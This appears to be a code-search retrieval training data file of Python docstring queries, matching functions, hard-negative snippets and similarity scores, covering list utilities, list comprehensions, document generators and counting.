"def PLCTYPE_ARR_REAL(n: int) -> Type[Array]:\n return c_float * n",
"def numpify(x: Union[List, np.ndarray, torch.Tensor]) -> np.ndarray:\n if isinstance(x, np.ndarray):\n return x\n if isinstance(x, List):\n return np.array(x)\n if isinstance(x, torch.Tensor):\n return x.cpu().numpy()\n raise TypeError(\"Expected input of type List, np.ndarray, or torch.Tensor.\")",
"def test_cast_array(self):\n dim = Integer(\"yolo\", \"uniform\", -3, 5)\n assert np.all(dim.cast(np.array([\"1\", \"2\"])) == np.array([1, 2]))"
] |
[
"0.70484656",
"0.6914373",
"0.6910644",
"0.672295",
"0.6563476",
"0.64376646",
"0.6310567",
"0.6294734",
"0.62499875",
"0.6187154",
"0.6168736",
"0.61499",
"0.61470413",
"0.61454135",
"0.61355835",
"0.61354077",
"0.61266613",
"0.6124175",
"0.61011404",
"0.6092799",
"0.608155",
"0.6078325",
"0.60275453",
"0.60062873",
"0.5992603",
"0.5976059",
"0.59722096",
"0.5944379",
"0.59434557",
"0.59347665"
] |
0.7440226
|
0
|
Creating an empty list and populating it with random values using random.seed() and random.randint()
|
def populate_empty_list():
from random import randint, seed
seed(56)
l = []
for i in range(100):
l.append(randint(0, 100))
print(l[34:56])
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_list(self):\n\n\t\trandom_list = random.sample(range(0, 500), 10)\n\n\t\treturn random_list",
"def newList(self):\n lst = []\n count = 0\n while count < 52:\n lst.append(randint(1, 1500))\n count += 1\n return lst",
"def random():\n np.random.seed(1939)",
"def random():\n np.random.seed(0)",
"def generate_list(size):\n items = [randint(0, MAX_NUM) for i in range(size)]\n return items",
"def spinit(list):\n return (random.choice(list))",
"def seed(self, seed=None) -> List[np.ndarray]:\n self.np_random, seed_0 = seeding.np_random(seed)\n seed_1 = seeding.hash_seed(seed_0 + 1) % 2 ** 31\n return [seed_0, seed_1]",
"def _seed(self, seed=None):\n self.rng, seed = seeding.np_random(seed)\n return [seed]",
"def default_values():\r\n start_lists = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]]\r\n start = 0\r\n while start < 2:\r\n inde1 = random.randint(0, 3)\r\n inde2 = random.randint(0, 3)\r\n choice = random.randint(0, 7)\r\n if choice == 0:\r\n if start_lists[inde1][inde2] == 0:\r\n start_lists[inde1][inde2] = 4\r\n else:\r\n if start_lists[inde1][inde2] == 0:\r\n start_lists[inde1][inde2] = 2\r\n start = start + 1\r\n return start_lists",
"def Randomize(seed=None):\n random.seed()",
"def initialize_randomness(seed):",
"def seed():",
"def generate_list(length: int) -> list:\n\n return [randint(0, length + 1) for _ in range(length)]",
"def seed_random():\n random.seed(0)",
"def _seed_population(self):\n return [self._generate_weights() for x in range(self.population_size)]",
"def initialize(self):\n N=self.N\n M=[]\n a=random.rand(self.d,1,self.D)\n M.append(a)\n for i in range(1,N-1):\n a=random.rand(self.d,self.D,self.D)\n M.append(a)\n a=random.rand(self.d,self.D,1)\n M.append(a)\n return M",
"def generator(self, random, args):\r\n if self.duplicates:\r\n max_count = [self.capacity // item[0] for item in self.items]\r\n return [random.randint(0, m) for m in max_count]\r\n else:\r\n return [random.choice([0, 1]) for _ in range(len(self.items))]",
"def seed (self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]",
"def generateRandomList(minval, maxval, size):\n return [random.randint(minval, maxval) for _ in range(size)]",
"def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]",
"def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]",
"def randomize(self):\n \n spins = [np.random.random() > 0.5 for x in range(self.size)]\n self.spins_initial = bitarray.bitarray(spins)",
"def generate_seed():\n global seed\n seed = []\n\n for char_id in range(0, len(printable)):\n while True:\n char_sequence = [printable[randint(0, len(printable)-1)], printable[randint(0, len(printable)-1)]]\n if char_sequence not in seed:\n break\n seed.append(char_sequence)",
"def _initialize_seed(self, seed: Optional[int] = None) -> List[np.uint32]:\n # Generate a sequence of 3 bytes uint32 seeds\n self._seed = list(np.random.SeedSequence(seed).generate_state(3))\n\n # Re-initialize the low-level bit generator based on the provided seed\n self.np_random.bit_generator.state = np.random.SFC64(self._seed).state\n\n # Reset the seed of the action and observation spaces\n self.observation_space.seed(seed)\n self.action_space.seed(seed)\n\n # Reset the seed of Jiminy Engine\n self.simulator.seed(self._seed[0])\n\n return self._seed",
"def getRandomList(n):\n lyst = list()\n for count in range (n):\n lyst.append(random.randint(1, n))\n return lyst",
"def list_gen(value):\n\n sample_list = random.sample(xrange(1, (value + 1)), value)\n return sample_list",
"def shuffle(list_, random_seed=123):\n random.Random(random_seed).shuffle(list_)",
"def seed(self, seed=None):\n self._np_random, seed = seeding.np_random(seed)\n return [seed]",
"def shuffle(self):\n new_list = [] \n while True:\n if len(self.init_nums) == 0 :\n pass\n break\n else: \n while self.init_nums is not None: \n if len(self.init_nums) is 0: \n break\n else :\n ks = random.choice(self.init_nums) \n new_list.append(ks)\n self.init_nums.remove(ks)\n\n if self.orig == new_list:\n continue\n else:\n print(new_list)\n break \n self.init_nums = new_list\n return(new_list)",
"def make_repeatable():\n random.seed(1234)\n np.random.seed(1234)"
] |
[
"0.73266876",
"0.7185752",
"0.68597156",
"0.6845599",
"0.68304396",
"0.68276584",
"0.68155515",
"0.68108755",
"0.6799451",
"0.67544883",
"0.6745315",
"0.674205",
"0.66945124",
"0.66901034",
"0.66744536",
"0.6666645",
"0.6641088",
"0.66403663",
"0.66161585",
"0.66082114",
"0.66082114",
"0.65786713",
"0.65664196",
"0.65544605",
"0.65276456",
"0.65251124",
"0.6488394",
"0.64851135",
"0.6463901",
"0.6461123"
] |
0.7981575
|
0
|
Showing examples of list comprehension. list comprehension over an array.array() list comprehension over a list of strings list comprehension with enumerate(), to find indices of all occurrences of an element in a list Using str() and join() in printing results.
|
def demonstrate_list_comprehension():
from array import array
a = array('i', [4, 2, 8, 9])
l = [i for i in a]
print(l)
l = [str(i) for i in a]
print(l)
print()
john = ['John', 'Lennon', 'Liverpool']
l = [s for s in john]
print(l)
print(', '.join(s for s in john))
print(', '.join(john))
print()
songs = ['Imagine a Man', 'There\'s a Place', 'No Expectations', 'Heaven is a Place on Earth']
first_words = [words[0] for words in [title.split() for title in songs]]
print(first_words)
print(' '.join(first_words))
lyric = [first_words[0]] + [word.lower() for word in first_words[1:]]
print(' '.join(lyric))
print()
songs = ['No Expectations', 'Imagine a Man', 'There\'s a Place', 'No Expectations', 'Heaven is a Place on Earth',
'No Expectations', 'No Expectations', ]
print([i for i, k in enumerate(songs) if k == 'No Expectations'])
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _pick_elements(self,regexp_ind,array_list):\r\n new_array_list = [] #New list with elements matching regexp_ind\r\n array_indices = [] #Indices that matches the arrays in new_array_list and array_list\r\n\r\n array_index = 0\r\n for array in array_list:\r\n _new = []\r\n for ai in array:\r\n if ai in regexp_ind:\r\n _new.append(ai)\r\n if len(_new):\r\n new_array_list.append(np.array(_new))\r\n array_indices.append(array_index)\r\n array_index += 1\r\n return new_array_list, array_indices",
"def matchloc(alist,val): \n return [ilc for ilc,jlc in enumerate(alist) if jlc==val]",
"def parameter_finder(target_list, search_list, msgflag=False, exact=False):\n target_list = [x.lower() for x in target_list]\n\n indexes = []\n\n if isinstance(search_list, str):\n cont = 0\n search_list = search_list.lower()\n for t in target_list:\n if exact == False and search_list in t:\n indexes.append(cont)\n elif exact == True and search_list == t:\n indexes.append(cont)\n cont += 1\n if isinstance(search_list, list):\n search_list = [x.lower() for x in search_list]\n\n for s in search_list:\n s = str(s)\n for cont, t in enumerate(target_list):\n if exact == False and s in t:\n print((s, t))\n indexes.append(cont)\n elif exact == True and s == t:\n print((s, t))\n indexes.append(cont)\n\n if msgflag == True:\n length = len(indexes)\n if length > 1: print(\"There were several ocurrences\")\n if length == 0: print(\"No ocurrences found\")\n\n return indexes",
"def occurence(main_seq,sub_seq):\n start= 0\n indices =[]\n while True:\n start = main_seq.find(sub_seq,start)\n if start > 0:\n indices.append(start)\n else:\n break\n start +=1\n return indices",
"def print_search(search_result: list):\n\n for i, element in enumerate(search_result):\n print(f\"{i} = {element[1]}\")",
"def print_list_index(iterable_item):\n if str(type(iterable_item)) == \"<class 'str'>\":\n characters = list(iterable_item)\n for i in enumerate(characters):\n print(characters[i], \":\", i)\n if str(type(iterable_item)) == \"<class 'list'>\":\n for i in enumerate(iterable_item):\n print(iterable_item[i], \":\", i)",
"def test_enumerate_list(self) -> None:\n self.assertEqual(list(my_enumerate('Janki Patel')), list(enumerate('Janki Patel')))\n \"\"\"test that in one side it has janki patel but in another side it has blank string so this is not equla function\"\"\"\n self.assertNotEqual(list(my_enumerate('Janki Patel')), list(enumerate('')))\n self.assertNotEqual(list(my_enumerate('Janki')), list(enumerate('Janak')))",
"def findall(l, o):\n return [i for i, u in enumerate(l) if u==o]",
"def my_index(list_, element):\n pos = []\n for i in range(len(list_)):\n if list_[i] == element:\n pos.append(i)\n return pos",
"def make_indexed_list(x_iter):\n return [\"{} {}\".format(bracket_pad_num(i + 1, len(x_iter)), x_iter[i]) for i in range(len(x_iter))]",
"def test_list_occurrences(self):\n pass",
"def py_enumerate_list_index_target():\n target = [None]\n for target[0],k in enumerate(range(1,5)):\n print(target, k)",
"def indexAll(inputList=None, value=None):\r\n if not isinstance(inputList, list):\r\n raise TypeError('Input list must be a list object.')\r\n return [i for i, x in enumerate(inputList) if x == value]",
"def indexer(list1, list2):\r\n\tindex_list = []\r\n\tfor x in list2:\r\n\t\tfor y in list1:\r\n\t\t\tif x == y:\r\n\t\t\t\tindex = list1.index(x)\r\n\t\t\t\tindex_list.append(index)\r\n\treturn index_list",
"def occ_indices(self):\n indices = []\n for index,item in enumerate(self):\n if item==1:\n indices.append(index)\n return indices",
"def test_search_list_found(self):\r\n self.assertEqual(search_array([6, 4, 9, 10], 9), 2)",
"def check_strings_occ(data: np.ndarray, idx: int, threshold: int):\n [arr, count] = np.unique(data[:, idx], return_counts=True)\n print(list(arr[np.where(count < threshold)]))\n print((arr[np.where(count < threshold)].shape[0]))\n print(list(zip(list(arr[np.where(count > threshold)]), list(count[np.where(count > threshold)]))))\n print(list(zip(list(arr[np.where(count < threshold)]), list(count[np.where(count < threshold)]))))",
"def get_indexes(from_list, find_list):\n\n df_find = pd.DataFrame(find_list, columns=['value'])\n df_from = pd.DataFrame(list(zip(from_list, np.arange(len(from_list)))), columns=['value', 'index'])\n indexes = pd.merge(df_from, df_find, on='value', how='inner')['index'].values\n return indexes",
"def list_item_indexes(list_arg: list, item: Any) -> Tuple[int, ...]:\n indexes = [index for index, value in enumerate(list_arg) if value == item]\n return indexes",
"def get_coincidence_indices(self, lst, element):\n result = []\n offset = -1\n while True:\n try:\n offset = lst.index(element, offset+1)\n except ValueError:\n return result\n result.append(offset)",
"def element_list(species):\n counter = Counter(species)\n elementlist = []\n for x in counter:\n elementlist.append([str(x), counter[x]])\n return elementlist",
"def enumerate_list(seq):\n return zip(xrange(len(seq)), seq)",
"def list_to_idx(lst, typecode):\n magicnumber = _build_magic_number(lst, typecode)\n dimension_sizes = _build_dimension_sizes(lst)\n data = _build_data(lst, typecode)\n\n return magicnumber + dimension_sizes + data",
"def test_search_sequence_numpy():\n arr = np.array(list('abcbdababz'))\n seq = np.array([list('ab')])\n np.testing.assert_equal(search_sequence_numpy(arr, seq), np.array([0, 1, 5, 6, 7, 8]))",
"def get_positions(token, docs):\n\n all_matches = [token]\n for doc in docs:\n matches = []\n if token in doc:\n indexes = [i for i, x in enumerate(doc) if x == token]\n matches += [docs.index(doc), len(indexes), indexes]\n if matches:\n all_matches.append(matches)\n return all_matches",
"def display_word_status(word, indexes_found):\n status = []\n for i in range(len(word)):\n if i in indexes_found:\n status.append(word[i])\n else:\n status.append('_')\n print('\\n[', \" \".join(status), '] \\n')",
"def _get_indices(input_items, wanted_items):\r\n # Note: Some of this code is taken from Jeremy Widmann's\r\n # get_valid_indices() function, part of make_distance_histograms.py from QIIME 1.8.0.\r\n try:\r\n iter(input_items)\r\n except:\r\n raise ValueError(\"The input_items to search must be iterable.\")\r\n try:\r\n len(wanted_items)\r\n except:\r\n # We have a scalar value, so put it in a list.\r\n wanted_items = [wanted_items]\r\n if isinstance(wanted_items, basestring):\r\n wanted_items = [wanted_items]\r\n\r\n return [input_items.index(item)\r\n for item in wanted_items if item in input_items]",
"def _index_symbols(symbols):\n symbol_start_indices = []\n next_start_index = 0\n for symbol in symbols:\n entry_count = count_entries(symbol)\n if entry_count > EXAMPLE_SIZE:\n symbol_start_indices.append(next_start_index)\n next_start_index += entry_count - EXAMPLE_SIZE\n total_examples = next_start_index\n return symbol_start_indices, total_examples",
"def findings_2_idx(findings, corner_2_idx, funcx, funcy):\n idx = []\n for finding in findings:\n x, y = finding\n mesh = np.array(np.meshgrid(funcx(x), funcy(y))).swapaxes(1,2).reshape(2,-1).T\n idx.extend([corner_2_idx(c) for c in mesh])\n\n return np.unique(idx)",
"def indices(lst, element):\n result = []\n offset = -1\n while True:\n try:\n offset = lst.index(element, offset + 1)\n except ValueError:\n return result\n result.append(offset)"
] |
[
"0.59395385",
"0.5903913",
"0.5900641",
"0.5863628",
"0.5819813",
"0.5662459",
"0.5627906",
"0.5608562",
"0.55847615",
"0.5488613",
"0.5387361",
"0.53513455",
"0.531568",
"0.53117836",
"0.52748054",
"0.52639985",
"0.5258652",
"0.52479535",
"0.5230476",
"0.52175987",
"0.5175117",
"0.51727045",
"0.5166379",
"0.5135677",
"0.5132145",
"0.51178753",
"0.5108375",
"0.51082987",
"0.50986123",
"0.5063118"
] |
0.65372443
|
0
|
Yields document and labels concurrently
|
def train(self):
for doc, label in zip(self.train_docs(), self.train_labels()):
yield doc, label
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def iter_documents(self):\n raise NotImplementedError",
"def __iter__(self):\r\n for text in self.get_texts():\r\n yield self.dictionary.doc2bow(text, allow_update=False)",
"def _doc2vec_doc_stream(paths, n, tokenizer=word_tokenize, sentences=True):\n i = 0\n p = Progress()\n for path in paths:\n with open(path, 'r') as f:\n for line in f:\n i += 1\n p.print_progress(i/n)\n\n # We do minimal pre-processing here so the model can learn\n # punctuation\n line = line.lower()\n\n if sentences:\n for sent in sent_tokenize(line):\n tokens = tokenizer(sent)\n yield LabeledSentence(tokens, ['SENT_{}'.format(i)])\n else:\n tokens = tokenizer(line)\n yield LabeledSentence(tokens, ['SENT_{}'.format(i)])",
"def test(self):\n for doc, label in zip(self.test_docs(), self.test_labels()):\n yield doc, label",
"def parse_documents():\n\n\tcount_before = control.find().count()\n\n\tprint \"There are currently %i unprocessed records.\" % count_before\n\n\t#dispatch\n\t# executor = concurrent.futures.ThreadPoolExecutor(10)\n\t# futures = [executor.submit(analyze_message, document) for document in control.find()]\n\t# concurrent.futures.wait(futures)\n\n\tfor document in control.find():\n\t\tanalyze_message(document)\n\n\tcount_after = control.count()\n\tprint \"There are now %i stored records.\" % control.count()",
"def __iter__(self):\n for tokens in iter_documents(self.top_dir, self.types, self.sheets, self.np, self.ngrams):\n # transform tokens (strings) into a sparse vector, one at a time\n yield self.dictionary.doc2bow(tokens)",
"def __iter__(self):\n for tokens in readbook(self.path, self.ngrams):\n # transform tokens (strings) into a sparse vector, one at a time\n yield self.dictionary.doc2bow(tokens)",
"def __iter__(self):\n for this_document in self.documents:\n yield this_document",
"def multiple_document_processing(self) -> List:\n batch_list = []\n for doc, idx in self.__documents:\n entities_idx = {'idx': idx}\n entities_result = self.create_entity(document=doc)\n word_cleaned = self.clean_words(doc)\n entities_idx[self.key_spacy_text] = str(word_cleaned)\n entities_idx.update(entities_result)\n batch_list.append(entities_idx)\n return batch_list",
"def structure_PBDMS_annotations(documents, kb_data):\n \n doc_annotations = list()\n partial_func = partial(parse_PBDMS_doc, kb_data)\n \n with multiprocessing.Pool(processes=10) as pool:\n doc_annotations = pool.map(partial_func, documents)\n \n return doc_annotations",
"def __iter__(self):\n for p in self.paths:\n yield Document.load(os.path.join(self.dirpath, p), fmt=self.fmt)",
"def __iter__(self):\n for tokens in iter_folder(self.top_dir, self.ngrams):\n # transform tokens (strings) into a sparse vector, one at a time\n yield self.dictionary.doc2bow(tokens)",
"def learn(self, documents, labels):\n for i in xrange(len(documents)):\n text = documents[i]\n\n words = text.split()\n self.learn_from_one(words)",
"def annotate_documents(asynch=False):\n \n files = glob.glob(os.path.join(cfg.INPUT_PATH, cfg.INPUT_PATTERN))\n logger.info('found %d files with pattern %s', len(files), cfg.INPUT_PATTERN) \n \n if asynch:\n with concurrent.futures.ThreadPoolExecutor(max_workers=cfg.ASYNCH_MAX_WORKERS) as executor:\n executor.map(annotate_one, files)\n \n else: \n for f_json in files:\n annotate_one(f_json)\n \n \n return",
"def run(self, mapping={}, *args, **kwargs):\n self.processed = 0\n for batch in self._process_by_batch(self.load(*args, **kwargs)):\n batch = list(map(lambda doc: self._apply_mapping(doc, mapping), batch))\n for doc in batch:\n self._ingest(iterable=doc, doctype=doc[\"doctype\"])\n self.processed += 1\n logger.info(\"Added {} documents to the database.\".format(self.processed))",
"def train__iter__(self):\n\n # create worker-specific random number generator\n rng = create_rng_for_worker(self.model.current_epoch)\n\n while True:\n\n # select one file at random (with probability proportional to its annotated duration)\n file, *_ = rng.choices(\n self._train,\n weights=[f[\"duration\"] for f in self._train],\n k=1,\n )\n\n # select one annotated region at random (with probability proportional to its duration)\n segment, *_ = rng.choices(\n file[\"annotated\"],\n weights=[s.duration for s in file[\"annotated\"]],\n k=1,\n )\n\n # select one chunk at random (with uniform distribution)\n start_time = rng.uniform(segment.start, segment.end - self.duration)\n chunk = Segment(start_time, start_time + self.duration)\n\n X, one_hot_y, _ = self.prepare_chunk(file, chunk, duration=self.duration)\n\n y = self.prepare_y(one_hot_y)\n\n yield {\"X\": X, \"y\": y}",
"def generate_labels(cfg, split_files):\n for file_name in split_files:\n file_name = join(cfg.data_dir, file_name)\n\n for example in generate_examples(file_name):\n yield from example['labels']",
"def process(self):\r\n\r\n index = cindex.Index.create()\r\n self.headers = {}\r\n\r\n for f in self.files:\r\n if f in self.processed:\r\n continue\r\n\r\n print \"Processing `%s'\" % (os.path.basename(f),)\r\n\r\n tu = index.parse(f, self.flags)\r\n\r\n if len(tu.diagnostics) != 0:\r\n fatal = False\r\n\r\n for d in tu.diagnostics:\r\n sys.stderr.write(d.format)\r\n sys.stderr.write(\"\\n\")\r\n\r\n if d.severity == cindex.Diagnostic.Fatal or \\\r\n d.severity == cindex.Diagnostic.Error:\r\n fatal = True\r\n\r\n if fatal:\r\n sys.stderr.write(\"\\nCould not generate documentation due to parser errors\\n\")\r\n sys.exit(1)\r\n\r\n if not tu:\r\n sys.stderr.write(\"Could not parse file %s...\\n\" % (f,))\r\n sys.exit(1)\r\n\r\n # Extract comments from files and included files that we are\r\n # supposed to inspect\r\n extractfiles = [f]\r\n\r\n for inc in tu.get_includes():\r\n filename = str(inc.include)\r\n self.headers[filename] = True\r\n\r\n if filename in self.processed or (not filename in self.files) or filename in extractfiles:\r\n continue\r\n\r\n extractfiles.append(filename)\r\n\r\n for e in extractfiles:\r\n db = comment.CommentsDatabase(e, tu)\r\n\r\n self.add_categories(db.category_names)\r\n self.commentsdbs[e] = db\r\n\r\n self.visit(tu.cursor.get_children())\r\n\r\n for f in self.processing:\r\n self.processed[f] = True\r\n\r\n self.processing = {}\r\n\r\n # Construct hierarchy of nodes.\r\n for node in self.all_nodes:\r\n q = node.qid\r\n\r\n if node.parent is None:\r\n par = self.find_parent(node)\r\n\r\n # Lookup categories for things in the root\r\n if (par is None or par == self.root) and (not node.cursor is None):\r\n location = node.cursor.extent.start\r\n db = self.commentsdbs[location.file.name]\r\n\r\n if db:\r\n par = self.category_to_node[db.lookup_category(location)]\r\n\r\n if par is None:\r\n par = self.root\r\n\r\n par.append(node)\r\n\r\n # Resolve comment\r\n cm = self.find_node_comment(node)\r\n\r\n if cm:\r\n node.merge_comment(cm)\r\n\r\n # Keep track of classes to resolve bases and subclasses\r\n classes = {}\r\n\r\n # Map final qid to node\r\n for node in self.all_nodes:\r\n q = node.qid\r\n self.qid_to_node[q] = node\r\n\r\n if isinstance(node, nodes.Class):\r\n classes[q] = node\r\n\r\n # Resolve bases and subclasses\r\n for qid in classes:\r\n classes[qid].resolve_bases(classes)\r\n\r\n self.markup_code(index)",
"def preprocess_docs():\n\n print(\"Getting started!\")\n stopwords.populate_stopwords(NLP, STOPWORD_URL)\n\n print(str.format(\"Using data dir:{}\", DATA_DIR))\n\n csv_file = open(os.path.join(DATA_DIR, 'PDFs.csv'))\n reader = csv.reader(csv_file, 'excel')\n rows = list(reader)\n\n filenames = [_get_filename(row) for row in rows]\n\n pool = Pool(multiprocessing.cpu_count())\n\n try:\n pool.map(_get_item, rows)\n pool.map(pdf.extract_text, filenames)\n docs = pool.map(_extract_questions, rows)\n docs = [d for d in docs if d is not None]\n\n _find_similar(docs, simdoc=compare.compare_doc_keywords)\n\n for doc in docs:\n if doc is None:\n continue\n doc.save_json()\n\n except KeyboardInterrupt:\n pool.terminate()\n print(\"You cancelled the program!\")\n sys.exit(1)\n\n print(\"Done\")",
"def main():\n global collection\n #args = argparse.ArgumentParser()\n #args.add_argument('directory', help='Directory in which the files'\n #'are stored.')\n #args.add_argument('collection', help='The collection to use.')\n #parser = args.parse_args()\n collection = get_collection()\n #documents = glob.glob('*.asm')\n documents = collection.find()\n num_cores = multiprocessing.cpu_count()\n print('Running code on %d processors' % num_cores)\n Parallel(n_jobs=num_cores)(\\\n delayed(save_comments)(doc) for doc in documents)",
"def bulk_process(self):\n\n def actions():\n try:\n task = self.queue.get(block=False, timeout=None)\n\n if task['action'] == 'index':\n yield {\n '_op_type': 'index',\n '_index': self.ensure_index(task),\n '_id': task['id'],\n 'doc': task['properties']\n }\n elif task['action'] == 'delete':\n yield {\n '_op_type': 'delete',\n '_index': self.ensure_index(task),\n '_id': task['id'],\n 'doc': task['properties']\n }\n else:\n raise NotImplementedError\n\n except Empty:\n pass\n\n for success, info in streaming_bulk(self.es_client, actions()):\n if success:\n self.queue.task_done()",
"def batch(dir_path: str):\n for file_name in os.listdir(dir_path):\n clf_str = get_clf_from_file_name(file_name)\n if clf_str:\n print('start get keywords text rank of file {}'.format(file_name))\n file_path = os.path.join(dir_path, file_name)\n docs_json = json.dumps(get_json(file_path))\n # note that the docs json pass to pandas.read_json() function must be type of json string,\n # never pass a json obj to it!\n clf_data = pd.read_json(docs_json, encoding='utf-8')\n yield (clf_str, get_keywords_text_rank(clf_data, 10))",
"def iter_documents(input_file, transformer, positive_class=None): \n for index, row in enumerate(csv.reader(open(input_file))):\n title = row[1]\n description = row[2]\n tags = row[3].split(' ')\n \n if positive_class is None:\n output = tags\n else:\n output = int(positive_class in tags)\n\n if input_file in [CULLED_TRAIN_FILE, TRAIN_FILE] and index == 50000:\n break\n if input_file == TEST_FILE and index == 400:\n break\n\n yield (transformer.transform([title]), transformer.transform([description]), output)",
"def next(self):\n\t\t# keep looping until we reach our batch size\n\t\twhile True:\n\t\t\tret = self.get_batch()\n\t\t\tself.index += self.batch_size\n\t\t\tif self.index >= len(self.texts) - self.batch_size:\n\t\t\t\tself.index = 0\n\t\t\tyield ret",
"def inner_generator():\n # A buffer where observed query-document features will be stored.\n # It is a list of dictionaries, one per query-document pair, where\n # each dictionary is a mapping from a feature ID to a feature value.\n for p in processed:\n yield p",
"def __iter__(self):\n while True:\n if self.batches is None:\n for indexed_sentence in self.indexed_sentences:\n yield indexed_sentence\n else:\n for batch in self.batches:\n yield batch[:-1, :], batch[1:, :] # Return batch and target indices\n\n if not self.repeat:\n return",
"def __iter__(self):\n for hit in self._evaluate()['hits']['hits']:\n yield self._to_document(hit)",
"def generator(self):\n\n # Each thread gets its own randomized set of keys\n keys = self.loader.keys()\n\n while True:\n random.shuffle(keys)\n data_batch = []\n label_batch = []\n\n for key in keys:\n data = self.loader.get(key)\n s = StringIO(data)\n img = PIL.Image.open(s)\n img = img.resize((224, 224))\n img = img.convert('RGB')\n data_batch.append(np.array(img))\n\n label_str = self._classname_from_key(key)\n label_int = self._classname_to_label[label_str]\n label_arr = np.zeros(self.num_classes())\n label_arr[label_int] = 1 # one-hot encoding\n label_batch.append(label_arr)\n\n if len(data_batch) == 32: # batch size\n yield np.array(data_batch), np.array(label_batch)\n data_batch = []\n label_batch = []",
"def wrapped_f(*args):\n input_docs = func(*args)\n output_doc_cnt = 0\n # split input_docs into chunks of size self.batch_size\n for batchiter in iter_n(input_docs, int(self.batch_size / len(self.input_types))):\n output_docs = self.key_lookup_batch(batchiter)\n for odoc in output_docs:\n # print debug information if the original id is the in the debug list\n if \"dt_debug\" in odoc:\n if isinstance(self.debug, list) and odoc[\"dt_debug\"][\"orig_id\"] in self.debug:\n self.logger.debug(\"DataTransform Debug doc['dt_debug']: {}\".format(odoc[\"dt_debug\"]))\n output_doc_cnt += 1\n yield odoc\n self.logger.info(\"wrapped_f Num. output_docs: {}\".format(output_doc_cnt))\n self.logger.info(\"DataTransform.histogram: {}\".format(self.histogram))",
"def gather_documents(self):\n self.document_gatherer.gather_and_save_everything(Constants.path_cord, \n Constants.path_metadata, \n Constants.path_linked_documents,\n Constants.path_unlinked_documents,\n Constants.path_parsed_documents,\n Constants.path_all_documents)\n \n print(\"Done gathering documents.\")"
] |
[
"0.59345233",
"0.58938026",
"0.57813835",
"0.57674474",
"0.57280785",
"0.5700913",
"0.56669515",
"0.5642201",
"0.5626246",
"0.56216335",
"0.5612161",
"0.5595699",
"0.5554058",
"0.5533326",
"0.5528166",
"0.5516686",
"0.5511766",
"0.5447907",
"0.54181635",
"0.54145205",
"0.5397193",
"0.5394273",
"0.5364344",
"0.5359191",
"0.53401023",
"0.53381723",
"0.5232529",
"0.5225127",
"0.52250063",
"0.5196127"
] |
0.6574284
|
0
|
Function that takes a counter and a set and returns the sum of counts for all items in that set
|
def number_in_set(c,s):
return sum(v for k,v in c.items() if k in s)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def countInSet(a, aSet):\n return sum(v for k, v in Counter(a).items() if k in aSet)",
"def sumSet(weightedSet):\n\tsum = 0\n\tfor example in weightedSet:\n\t\tsum += example.weight\n\treturn sum",
"def count(self, pset):\n return self._sets.count(pset)",
"def count(iterable):\n return sum(1 for whatever in iterable)",
"def count(iterable):\n\treturn sum(1 for _ in iterable)",
"def count(iterable):\n return sum(1 for _ in iterable)",
"def singles(counts):\n return (counts==1).sum()",
"def count(iterable: Iterable) -> int:\n return sum(1 for x in iterable)",
"def getCount(self, event):\n # Attempt 2: Still too slow\n count = 0\n \n for mEvent in self:\n if event.__st__(mEvent):\n count += 1\n \n return count\n \n # Attempt 1: Too slow\n #return reduce((lambda x, y: x+y),\n # map((lambda i: itemset <= i), self))",
"def k_ary_support_count(itemset, tagnamesdict):\n X = itemset[0]\n x_list = tagnamesdict[X]\n inter = set(x_list)\n\n for i in range(1, len(itemset)):\n Y = itemset[i]\n y_list = tagnamesdict[Y]\n inter = inter.intersection(y_list)\n\n support_count = len(inter)\n return support_count",
"def num_of_sets(l):\r\n distinct_sweets = set(l) #let's find all distinct sweets from input list\r\n dict_of = {} #empty dict to store key:value (sweet:number of occurrences)\r\n\r\n for i in distinct_sweets:\r\n dict_of[i] = l.count(i)\r\n \r\n key_min = min(dict_of.keys(), key=(lambda k: dict_of[k]))\r\n return dict_of[key_min]",
"def count(self, value=None):\r\n\t\t_set = list(set(self.sample))\r\n\t\tif value == None: return {_set[i]: self.sample.count(_set[i]) for i in range(len(_set))}\r\n\t\telse:\r\n\t\t\ttry: return {_set[i]: self.sample.count(_set[i]) for i in range(len(_set))}[value]\r\n\t\t\texcept: return 0",
"def total(init=5, *numbers, **keywords):\n count = init\n for number in numbers:\n count += number\n\n for key in keywords:\n count += keywords[key]\n\n return count",
"def count(x):\n return sum(len(y) for y in x)",
"def part_two(rucksacks: list) -> int:\n summ = 0\n for i in range(0, len(rucksacks), 3):\n first_group = set(rucksacks[i])\n second_group = set(rucksacks[i + 1])\n third_group = set(rucksacks[i + 2])\n badge = first_group.intersection(second_group).intersection(third_group)\n badge = list(badge)[0] # extract item id from set\n summ += PRIORITY.get(badge, 0)\n return summ",
"def group_count(counts, comp_ids):\n # binning\n for i in range(comp_ids.size):\n val = comp_ids[i]\n counts[val] += 1\n # inclusive scan\n total = 0\n for i in range(counts.size):\n ct = counts[i]\n counts[i] = ct + total\n total += ct",
"def part_one(rucksacks: list) -> int:\n summ = 0\n for rucksack in rucksacks:\n split_point = len(rucksack) // 2\n first = set(rucksack[:split_point])\n second = set(rucksack[split_point:])\n misplaced_item = list(first.intersection(second))[0]\n summ += PRIORITY.get(misplaced_item, 0)\n return summ",
"def compute_vocab_count(sents):\n counter = collections.Counter()\n for sentence in sents:\n counter.update(untag(sentence))\n return counter",
"def count(seq):\n\treturn sum(1 for x in seq)",
"def total(my_list, item):\n return my_list.count(item)",
"def __call__(self, uast):\n bag = defaultdict(int)\n for node in self.uast2graphlets(uast):\n bag[self.node2key(node)] += 1\n return bag",
"def total_count(count):\n return sum(count.values())",
"def counts(sequence):\n # initialize the countainer\n count = defaultdict(int)\n # iterates through sequence elements\n for item in sequence:\n # if element not in counts add 0\n # else add 1\n count[item] = count.get(item, 0) + 1\n return dict(count)",
